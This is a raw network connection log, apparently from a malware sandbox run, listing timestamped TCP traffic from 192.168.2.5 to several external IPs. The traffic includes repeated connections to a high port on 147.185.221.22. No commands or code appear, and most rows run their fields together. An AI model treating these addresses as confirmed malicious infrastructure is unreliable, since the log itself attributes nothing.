Sep 7, 2024 01:48:01.886795044 CEST  49752  19496  192.168.2.5  147.185.221.22
Sep 7, 2024 01:48:01.891694069 CEST  19496  49752  147.185.221.22  192.168.2.5
Sep 7, 2024 01:48:02.210716009 CEST  49753  80  192.168.2.5  208.95.112.1
Sep 7, 2024 01:48:02.215578079 CEST  80  49753  208.95.112.1  192.168.2.5
Sep 7, 2024 01:48:02.215656996 CEST  49753  80  192.168.2.5  208.95.112.1
Sep 7, 2024 01:48:02.215751886 CEST  49753  80  192.168.2.5  208.95.112.1
Sep 7, 2024 01:48:02.221046925 CEST  80  49753  208.95.112.1  192.168.2.5
Sep 7, 2024 01:48:02.799417019 CEST  80  49753  208.95.112.1  192.168.2.5
Sep 7, 2024 01:48:02.808799982 CEST  49753  80  192.168.2.5  208.95.112.1
Sep 7, 2024 01:48:02.813925982 CEST  80  49753  208.95.112.1  192.168.2.5
Sep 7, 2024 01:48:02.813978910 CEST  49753  80  192.168.2.5  208.95.112.1
Sep 7, 2024 01:48:03.885996103 CEST  49754  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:48:03.886050940 CEST  443  49754  188.114.97.3  192.168.2.5
Sep 7, 2024 01:48:03.886159897 CEST  49754  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:48:03.887999058 CEST  49754  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:48:03.888015985 CEST  443  49754  188.114.97.3  192.168.2.5
Sep 7, 2024 01:48:04.386285067 CEST  443  49754  188.114.97.3  192.168.2.5
Sep 7, 2024 01:48:04.386364937 CEST  49754  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:48:04.387725115 CEST  49754  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:48:04.387737036 CEST  443  49754  188.114.97.3  192.168.2.5
Sep 7, 2024 01:48:04.387978077 CEST  443  49754  188.114.97.3  192.168.2.5
Sep 7, 2024 01:48:04.410171032 CEST  49754  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:48:04.456499100 CEST  443  49754  188.114.97.3  192.168.2.5
Sep 7, 2024 01:48:04.564424038 CEST  443  49754  188.114.97.3  192.168.2.5
Sep 7, 2024 01:48:04.564496040 CEST  443  49754  188.114.97.3  192.168.2.5
Sep 7, 2024 01:48:04.564551115 CEST  49754  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:48:04.565434933 CEST  49754  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:48:04.566550016 CEST  49756  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:48:04.566589117 CEST  443  49756  104.21.85.189  192.168.2.5
Sep 7, 2024 01:48:04.566668034 CEST  49756  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:48:04.567034960 CEST  49756  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:48:04.567048073 CEST  443  49756  104.21.85.189  192.168.2.5
Sep 7, 2024 01:48:05.047724009 CEST  443  49756  104.21.85.189  192.168.2.5
                                      Sep 7, 2024 01:48:05.047811031 CEST49756443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:05.057378054 CEST49756443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:05.057398081 CEST44349756104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:05.057641029 CEST44349756104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:05.058504105 CEST49756443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:05.104500055 CEST44349756104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:05.388572931 CEST44349756104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:05.388605118 CEST44349756104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:05.388633013 CEST44349756104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:05.388691902 CEST49756443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:05.388710022 CEST44349756104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:05.388720036 CEST44349756104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:05.388761997 CEST49756443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:05.390717030 CEST49756443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:06.261543036 CEST49758443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:06.261584997 CEST44349758188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:06.261703968 CEST49758443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:06.264198065 CEST49758443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:06.264216900 CEST44349758188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:06.701728106 CEST1949649752147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:06.701854944 CEST4975219496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:06.760030031 CEST44349758188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:06.760113955 CEST49758443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:06.761615992 CEST49758443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:06.761635065 CEST44349758188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:06.761864901 CEST44349758188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:06.777703047 CEST49758443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:06.824502945 CEST44349758188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:06.896924973 CEST44349758188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:06.896985054 CEST44349758188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:06.897038937 CEST49758443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:06.897866964 CEST49758443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:06.898960114 CEST49759443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:06.898994923 CEST44349759104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:06.899143934 CEST49759443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:06.899408102 CEST49759443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:06.899418116 CEST44349759104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:07.004169941 CEST4974380192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:07.377073050 CEST44349759104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:07.377161026 CEST49759443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:07.381167889 CEST49759443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:07.381175995 CEST44349759104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:07.381434917 CEST44349759104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:07.383047104 CEST49759443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:07.428495884 CEST44349759104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:07.528428078 CEST44349759104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:07.528469086 CEST44349759104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:07.528498888 CEST44349759104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:07.528548002 CEST49759443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:07.528567076 CEST44349759104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:07.528578997 CEST44349759104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:07.528639078 CEST49759443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:07.530922890 CEST49759443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:07.751466036 CEST4975219496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:07.753505945 CEST4976019496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:07.758975029 CEST1949649752147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:07.758990049 CEST1949649760147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:07.759083033 CEST4976019496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:07.778106928 CEST4976019496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:07.783024073 CEST1949649760147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:08.671036005 CEST49761443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:08.671080112 CEST44349761188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:08.671150923 CEST49761443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:08.673171997 CEST49761443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:08.673185110 CEST44349761188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:09.165455103 CEST44349761188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:09.165539026 CEST49761443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:09.167215109 CEST49761443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:09.167222977 CEST44349761188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:09.167448997 CEST44349761188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:09.181615114 CEST49761443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:09.228502035 CEST44349761188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:09.287836075 CEST44349761188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:09.287909985 CEST44349761188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:09.287961006 CEST49761443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:09.288674116 CEST49761443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:09.289736032 CEST49763443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:09.289796114 CEST44349763104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:09.289869070 CEST49763443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:09.290118933 CEST49763443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:09.290134907 CEST44349763104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:09.753707886 CEST44349763104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:09.753772020 CEST49763443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:09.754893064 CEST49763443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:09.754899979 CEST44349763104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:09.755132914 CEST44349763104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:09.757611036 CEST49763443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:09.804492950 CEST44349763104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:09.914058924 CEST44349763104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:09.914108992 CEST44349763104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:09.914140940 CEST44349763104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:09.914213896 CEST44349763104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:09.914258957 CEST49763443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:09.915889025 CEST49763443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:10.111416101 CEST4976480192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:10.116168022 CEST8049764208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:10.116249084 CEST4976480192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:10.116369963 CEST4976480192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:10.121098995 CEST8049764208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:10.702446938 CEST8049764208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:10.750519991 CEST4976480192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:10.897876024 CEST8049764208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:10.897952080 CEST4976480192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:10.974395990 CEST49765443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:10.974457979 CEST44349765188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:10.974524021 CEST49765443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:10.976422071 CEST49765443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:10.976435900 CEST44349765188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:12.286892891 CEST44349765188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:12.286957026 CEST49765443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:12.288203955 CEST49765443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:12.288213968 CEST44349765188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:12.288453102 CEST44349765188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:12.299257040 CEST49765443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:12.344507933 CEST44349765188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:12.420573950 CEST44349765188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:12.420649052 CEST44349765188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:12.420725107 CEST49765443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:12.421351910 CEST49765443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:12.422938108 CEST49766443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:12.422972918 CEST44349766104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:12.423063993 CEST49766443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:12.423294067 CEST49766443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:12.423306942 CEST44349766104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:12.712366104 CEST1949649760147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:12.712433100 CEST4976019496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:13.152247906 CEST44349766104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:13.152335882 CEST49766443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:13.153808117 CEST49766443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:13.153831959 CEST44349766104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:13.154494047 CEST44349766104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:13.155375957 CEST49766443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:13.200500011 CEST44349766104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:13.320004940 CEST44349766104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:13.320055008 CEST44349766104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:13.320086956 CEST44349766104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:13.320117950 CEST49766443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:13.320161104 CEST44349766104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:13.320178986 CEST44349766104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:13.320218086 CEST49766443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:13.323271036 CEST49766443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:15.186912060 CEST4976019496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:15.380738974 CEST1949649760147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:15.416980028 CEST4976719496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:15.422064066 CEST1949649767147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:15.422133923 CEST4976719496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:15.553402901 CEST49768443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:15.553440094 CEST44349768188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:15.553621054 CEST49768443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:15.555816889 CEST49768443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:15.555829048 CEST44349768188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:15.596390009 CEST4976719496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:15.601224899 CEST1949649767147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:16.062894106 CEST4976980192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:16.339689016 CEST8049769208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:16.339764118 CEST4976980192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:16.339941978 CEST4976980192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:16.341475964 CEST44349768188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:16.341558933 CEST49768443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:16.343358994 CEST49768443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:16.343364954 CEST44349768188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:16.343621016 CEST44349768188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:16.344773054 CEST8049769208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:16.372101068 CEST49768443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:16.416496992 CEST44349768188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:16.487240076 CEST44349768188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:16.487298965 CEST44349768188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:16.487386942 CEST49768443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:16.488053083 CEST49768443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:16.496401072 CEST49770443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:16.496447086 CEST44349770104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:16.496531963 CEST49770443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:16.496807098 CEST49770443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:16.496824980 CEST44349770104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:16.903023958 CEST8049769208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:16.913681984 CEST4976980192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:16.918843031 CEST8049769208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:16.918930054 CEST4976980192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:16.969753027 CEST44349770104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:16.969831944 CEST49770443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:16.971378088 CEST49770443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:16.971390963 CEST44349770104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:16.971628904 CEST44349770104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:16.972425938 CEST49770443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:17.012504101 CEST44349770104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:17.106885910 CEST44349770104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:17.106926918 CEST44349770104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:17.106951952 CEST44349770104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:17.107008934 CEST49770443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:17.107052088 CEST44349770104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:17.107073069 CEST44349770104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:17.107100010 CEST49770443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:17.107132912 CEST49770443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:17.109641075 CEST49770443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:18.755775928 CEST49771443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:18.755815983 CEST44349771162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:18.755888939 CEST49771443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:18.756215096 CEST49771443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:18.756226063 CEST44349771162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:19.270901918 CEST44349771162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:19.270967960 CEST49771443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:19.278731108 CEST49771443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:19.278748989 CEST44349771162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:19.278963089 CEST44349771162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:19.280239105 CEST49771443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:19.320503950 CEST44349771162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:19.385838032 CEST44349771162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:19.387835979 CEST49771443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:19.387849092 CEST44349771162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:19.630053997 CEST44349771162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:19.630156994 CEST44349771162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:19.630222082 CEST49771443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:19.631212950 CEST49771443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:19.631901026 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:19.631943941 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:19.632136106 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:19.632360935 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:19.632374048 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.050405025 CEST49773443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:20.050450087 CEST44349773188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:20.051357031 CEST49773443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:20.058787107 CEST49773443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:20.058804989 CEST44349773188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:20.096615076 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.097876072 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.097910881 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.214617968 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.254281044 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.254281044 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.254329920 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.254343987 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.254750013 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.254755974 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.254812956 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.254827023 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.254888058 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.254899979 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.254951000 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.254961014 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.254976988 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.254987001 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.254996061 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.255007982 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.255065918 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.255075932 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.255098104 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.255110025 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.255124092 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.255134106 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.255151987 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.255162954 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.255307913 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.255323887 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.255345106 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.255353928 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.255362034 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.255372047 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.255378962 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.255387068 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.255508900 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.255520105 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.255527020 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.255533934 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:40.701145887 CEST4979880192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:40.707237005 CEST8049798208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:40.707390070 CEST4979880192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:40.707492113 CEST4979880192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:40.712577105 CEST8049798208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:41.192111015 CEST8049798208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:41.243963957 CEST4979880192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:41.249066114 CEST8049798208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:41.249166965 CEST4979880192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:41.535046101 CEST49799443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:41.535089016 CEST44349799188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:41.535156012 CEST49799443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:41.539212942 CEST49799443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:41.539230108 CEST44349799188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:42.170047998 CEST4970480192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:42.175025940 CEST8049704208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:42.224451065 CEST44349799188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:42.224519968 CEST49799443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:42.225881100 CEST49799443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:42.225889921 CEST44349799188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:42.226109982 CEST44349799188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:42.239351988 CEST49799443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:42.280503988 CEST44349799188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:42.351006031 CEST44349799188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:42.351064920 CEST44349799188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:42.351118088 CEST49799443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:42.351818085 CEST49799443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:42.362761021 CEST49800443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:42.362793922 CEST44349800104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:42.362855911 CEST49800443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:42.363176107 CEST49800443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:42.363188028 CEST44349800104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:42.819399118 CEST44349800104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:42.819513083 CEST49800443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:42.821131945 CEST49800443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:42.821141005 CEST44349800104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:42.821372986 CEST44349800104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:42.822299004 CEST49800443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:42.864505053 CEST44349800104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:42.990776062 CEST44349800104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:42.990832090 CEST44349800104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:42.990863085 CEST44349800104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:42.990946054 CEST44349800104.21.85.189192.168.2.5
